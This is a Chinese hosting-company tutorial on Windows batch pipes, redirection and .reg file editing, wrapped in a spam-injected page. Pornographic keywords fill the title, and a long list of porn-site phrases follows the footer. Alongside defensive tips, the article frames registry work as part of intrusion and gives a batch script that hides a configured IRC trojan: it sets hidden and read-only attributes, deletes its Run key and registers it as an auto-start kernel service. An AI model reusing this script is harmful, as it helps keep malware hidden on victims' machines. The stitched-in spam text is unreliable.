a毛片毛费观看-a毛片在线-a毛片在线观看-a毛片在线免费观看-国产成人综合洲欧美在线-国产成人综合高清在线观看

始創于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊有禮 登錄
  • 掛牌上市企業
  • 60秒人工響應
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補償
您的位置: 網站首頁 > 幫助中心>文章內容

批處理內部命令 (3)

發布時間:  2012/9/7 19:09:48

四、管道命令的使用
1.│ 命令
Usage:第一條命令 │ 第二條命令 [│ 第三條命令...]
將第一條命令的結果作為第二條命令的參數來使用,記得在unix中這種方式很常見。
sample:
time /t>>D:\IP.log
netstat -n -p tcp│find ":3389">>D:\IP.log
start Explorer
看出來了么?用于終端服務允許我們為用戶自定義起始的程序,來實現讓用戶運行下面這個bat,以獲得登
錄用戶的IP。
2.>、>>輸出重定向命令
將一條命令或某個程序輸出結果的重定向到特定文件中, > 與 >>的區別在于,>會清除調原有文件中的內
容后寫入指定文件,而>>只會追加內容到指定文件中,而不會改動其中的內容。
sample1:
echo hello world>c:\hello.txt (stupid example?)
sample2:
時下DLL木馬盛行,我們知道system32是個捉迷藏的好地方,許多木馬都削尖了腦袋往那里鉆,DLL馬也不
例外,針對這一點我們可以在安裝好系統和必要的應用程序后,對該目錄下的EXE和DLL文件作一個記錄:
運行CMD--轉換目錄到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
這樣所有的EXE和DLL文件的名稱都被分別記錄到exeback.txt和dllback.txt中,
日后如發現異常但用傳統的方法查不出問題時,則要考慮是不是系統中已經潛入DLL木馬了.
這時我們用同樣的命令將system32下的EXE和DLL文件記錄到另外的exeback1.txt和dllback1.txt中,然后運
行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比
較前后兩次的DLL和EXE文件,并將結果輸入到diff.txt中),這樣我們就能發現一些多出來的DLL和EXE文件,
然后通過查看創建時間、版本、是否經過壓縮等就能夠比較容易地判斷出是不是已經被DLL木馬光顧了。沒
有是最好,如果有的話也不要直接DEL掉,先用regsvr32 /u trojan.dll將后門DLL文件注銷掉,再把它移到
回收站里,若系統沒有異常反映再將之徹底刪除或者提交給殺毒軟件公司。
3.< 、>& 、<&
< 從文件中而不是從鍵盤中讀入命令輸入。
>& 將一個句柄的輸出寫入到另一個句柄的輸入中。
<& 從一個句柄讀取輸入并將其寫入到另一個句柄輸出中。
這些并不常用,也就不多做介紹。
 
五.如何用批處理文件來操作注冊表
在入侵過程中經常回操作注冊表的特定的鍵值來實現一定的目的,例如:為了達到隱藏后門、木馬程序而刪
除Run下殘余的鍵值;蛘邉摻ㄒ粋服務用以加載后門。當然我們也會修改注冊表來加固系統或者改變系統
的某個屬性,這些都需要我們對注冊表操作有一定的了解。下面我們就先學習一下如何使用.REG文件來操
作注冊表.(我們可以用批處理來生成一個REG文件)
關于注冊表的操作,常見的是創建、修改、刪除。
1.創建
創建分為兩種,一種是創建子項(Subkey)
我們創建一個文件,內容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
然后執行該腳本,你就已經在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下創建了一個名字為"hacker"的子
項。
另一種是創建一個項目名稱
那這種文件格式就是典型的文件格式,和你從注冊表中導出的文件格式一致,內容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
這樣就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about這三個項目
Invader的類型是"String value"
door的類型是"REG SZ value"
Autodos的類型是"DWORD value"
2.修改
修改相對來說比較簡單,只要把你需要修改的項目導出,然后用記事本進行修改,然后導入(regedit /s
)即可。
3.刪除
我們首先來說說刪除一個項目名稱,我們創建一個如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
執行該腳本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就
被刪除了;
我們再看看刪除一個子項,我們創建一個如下的腳本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
執行該腳本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已經被刪除了

相信看到這里,.reg文件你基本已經掌握了。那么現在的目標就是用批處理來創建特定內容的.reg文件了
,記得我們前面說道的利用重定向符號可以很容易地創建特定類型的文件。
samlpe1:如上面的那個例子,如想生成如下注冊表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要這樣:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我們現在在使用一些比較老的木馬時,可能會在注冊表的
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、
Runexec)]下生成一個鍵值用來實現木馬的自啟動.但是這樣很容易暴露木馬程序的路徑,從而導致木馬被查
殺,相對地若是將木馬程序注冊為系統服務則相對安全一些.下面以配置好地IRC木馬DSNX為例(名為
windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath=
c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [刪除DSNXDE在注冊表中的啟動項,用sc.exe將之注冊為系統關鍵性服務的同時將其屬性設為隱藏和
只讀,并config為自啟動]
@REM 這樣不是更安全.

六.精彩實例放送。
1.刪除win2k/xp系統默認共享的批處理
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>
c:\delshare.reg
echo "AutoShareWks"=dword:00000000>> c:\delshare.reg
echo "AutoShareServer"=dword:00000000>> c:\delshare.reg
echo Nowing using the registry file to chang the system default properties.
regedit /s c:\delshare.reg
echo Deleting the temprotarily files.
del c:\delshare.reg
goto :END
:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ------------------------------------------------------
goto :EOF
:END
echo.
echo -----------------------------------------

億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
   聯系:億恩小凡
   QQ:89317007
   電話:0371-63322206


本文出自:億恩科技【www.ibaoshan.net】

服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經營性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經營性ICP/ISP/IDC證:豫B1.B2-20060070
  • 億恩南昌公司:
  • 經營性ICP/ISP證:贛B2-20080012
  • 服務器/云主機 24小時售后服務電話:0371-60135900
  • 虛擬主機/智能建站 24小時售后服務電話:0371-60135900
  • 專注服務器托管17年
    掃掃關注-微信公眾號
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權所有  地址:鄭州市高新區翠竹街1號總部企業基地億恩大廈  法律顧問:河南亞太人律師事務所郝建鋒、杜慧月律師   京公網安備41019702002023號
      0
     
     
     
     

    0371-60135900
    7*24小時客服服務熱線

     
     
    亚洲欧美综合一区二区三区| 国产人久久人人人人爽| 西西人体大胆午夜啪啪| 男女啪啪永久免费网站| 国产精品乱子伦XXXX| 中文精品一区二区三区四区| 凸凹人妻人人澡人人添医| 免费A级毛片无码无遮挡| 国产乱码卡二卡三卡老狼| 99久久免费精品高清特色大片 | 成人欧美一区二区三区黑人牛| 亚洲人成无码网在线观看APP| 日日摸夜夜添夜夜添视频| 久久久亚洲欧洲日产国码AⅤ | 免费拗女网站1300部| 国产美女被遭强高潮免费网站| 97在线视频人妻无码| 亚洲VA久久久噜噜噜久久天堂| 人人妻人人妻人人片色AV| 久久精品99久久香蕉国产| 国产98色在线 | 免费| 装醉把自己给流浪汉玩| 亚洲AV色香蕉一区二区三区蜜桃| 人妻人人添人人爽夜夜欢视频| 久久AⅤ无码AV高潮AV喷吹| 夫妻互换呻吟抽插小说| 中文字幕天天躁日日躁狠狠躁免费 | 黑人精品一区二区三区| 被教官按在寝室狂到腿软视频| 亚洲欧美综合区丁香五月小说| 私人小影院久久久影院| 男人把大JI巴放进女人有视频| 和人妻隔着帘子按摩中字| 粗大抽搐白浊H高干H| 中文字幕无码一区二区免费 | 蜜芽亚洲AV无码精品国产午夜| 国产无遮挡无码很黄很污很刺激 | 无码久久精品国产亚洲AV影片| 欧美精品中文字幕亚洲专区| 精品少妇av无码美人妻| 国产成年无码V片在线| 99国精产品灬源码168| 亚洲国产精品热久久| 少妇搡BBBB搡BBB搡| 内射中出日韩无国产剧情| 护士人妻HD中文字幕| 丰满少妇AV无码区| 2023国产精品一卡2卡三卡| 亚洲国产成人A精品不卡在线| 色欲天天综合亚洲日本| 男朋友一晚弄了我5次正常吗| 精品国产青草久久久久福利| 夫妇联欢会回不去的夜晚| 99久久精品国产一区二区| 亚洲日韩一区二区三区黑人| 无码国产偷倩在线播放老年人| 欧美一区二区三区久久综合| 久久久免费无码成人影片| 国产亚洲欧洲综合5388| 催眠~凌~辱~学园 在线观看| 51无码人妻精品1国产| 亚洲日本一线产区和二线| 无码专区—VA亚洲V专区VR| 日本XXXX裸体撤尿| 蜜臀av色欲一区二区三区麻豆| 娇喘潮喷抽搐高潮在线视频| 国产成人精品视频网站| JAPANESEHD国产在线看| 永久AV狼友网站在线观看| 亚洲AV永久精品无码| 天堂国品一二三产品区别大吗| 强行糟蹋人妻HD中文字幕| 久久天天躁夜夜躁狠狠躁2022| 国内精自线一二三四2021| 国产95在线 | 亚洲| EEUSS鲁片一区二区三区| 一本一道久久综合久久| 亚洲AV无码专区国产乱码不卡| 太深太粗太大太猛太爽了视频| 人妻18毛片A级毛片免费看| 鲁一鲁一鲁一鲁一澡| 精品九九人人做人人爱| 国产精品成人亚洲777| 潮喷失禁大喷水AⅤ无码| 97在线 | 亚洲| 曰批全过程免费视频观看软件 | 国产性天天综合网| 丰满妇女强高潮18ⅩXXX| MM131美女大尺度私密照尤果| 中国人も日本人も汉字を| 亚洲欧美在线人成最新| 性生大片免费观看网站| 熟女少妇一区二区三区| 人人妻人人爽人人 | 又大又粗又爽的少妇免费视频| 亚洲AV无码专区国产乱码京东传| 铜铜铜铜铜铜铜铜铜好多水| 人与禽交VIDEOSGRATI| 内射干少妇亚洲69XXX| 久久一日本道色综合久久| 精品国产你懂的在线观看| 国产偷国产偷亚洲高清日韩| 国产WW久久久久久久久久| 成.人.大.片在线观看| CAOPORN免费视频在线| 中文字幕AV一区中文字幕天堂| 亚洲一区二区三区无码影院| 亚洲AV无码专区在线| 午夜.DJ高清在线观看免费7| 少妇精品揄拍高潮少妇| 日产乱码一二三区别免费下| 欧美视频一区二区图文| 男男av在线播放| 理论片午午伦夜理片影院| 久久精品AⅤ无码中文字字幕| 激情综合婷婷丁香五月尤物| 国产熟女一区二区三区四区五区| 国产极品粉嫩馒头一线天AV| 粉嫩小泬久久久久久久久久小说 | 国产成人精品亚洲日本专区61| 成人免费视频无码专区| ZOOM与人性ZOOM1区别| 99久久国语露脸精品国产色| 中文字幕免费不卡二区| 一二三四在线视频观看社区| 亚洲人成人一区二区在线观看| 亚洲国产精品久久久久蜜桃网站| 亚洲AⅤ无码牛牛影视| 西西GOGO大胆啪啪艺术| 无码人妻aⅴ一区二区三区99| 熟婦久久无码人妻av蜜臀| 色婷婷AV一区二区三区浪潮 | 蜜桃精品欧美一区二区三区 | 无码人妻精品一区二区三区下载 | 亚洲日韩欧美一区久久久久我| 亚洲成AV人无码综合在线| 亚洲AAAAA特级| 性生交大片免费看淑女出招| 无人区码卡二卡乱码字幕| 无码福利日韩神码福利片| 偷看娇妻在别人胯下沦陷小说| 熟妇人妻AV无码一区二区三区| 色偷偷色噜噜狠狠网站久久| 日韩人妻潮喷中文在线视频| 日韩AV无码午夜免费福利制服| 日本久久久久精品免费网播放 | 四季AV无码专区AV| 手机看片AV永久免费无| 色噜噜AV亚洲色一区二区| 日韩人妻无码精品专区90618 | 无码国产69精品久久久久孕妇 | 亚洲成AV人影片在线观看| 亚洲AV无码专区国产乱码波多野| 亚洲 A V无 码免 费 成| 亚洲 中文字幕 日韩 无码| 亚洲AV成人无码一区二区在线观看 | 嗯好爽快点插我视频在线播放| 成在线人AV免费无码高潮喷水 | 另类极品VPSWINDOWS| 美女扒开内裤无遮挡| 蜜臀AV无码人妻精品| 麻花豆传媒剧国产免费| 蜜乳一区在线视频| 免费无码观看的AV在线播放| 内射丰满熟妇18p一区二区| 欧美粗大无套GAY| 欧美性猛交XXXX乱大交视频| 人妻AV中文系列| 日产乱码一二三区别免费一| 色老头在线一区二区三区| 少妇特殊按摩高潮惨叫无码| 熟睡入侵JEALOUSVUE| 无码成人一区二区| 小SAO货大JI巴CAO死你H| 性中国少妇熟妇XXXX农村| 亚洲AV无码片区一区二区三区 | 亚洲中文字幕日产无码| 一区二区三区毛片| 中文亚洲AV片在线观看不卡| 88久久精品无码一区二区毛片| FREEZEFRAME丰满少妇| 爆乳2把你榨干哦在线观看| 厨房玩丰满人妻HD完整版视频| 高H乱好爽要尿了潮喷了| 国产寡妇XXXX猛交| 国产日产欧产精品精品推荐| 狠狠色伊人亚洲综合网站野外 | 每天都在挨CAO中醒来H| 男男黄GAY片免费网站WWW| 欧美又粗又大BBBB疯视频AV| 日本无吗无卡V免费清高清| 射精专区一区二区朝鲜| 无码一区二区三区中文字幕| 亚洲AV无码专区在线| 亚洲开心婷婷中文字幕| 夜夜高潮夜夜爽国产伦精品| 中文字幕女人妻热女人妻| MD豆传媒一二三区| 成人亚洲A片Ⅴ一区二区小说 | 国精产品一区二区三区|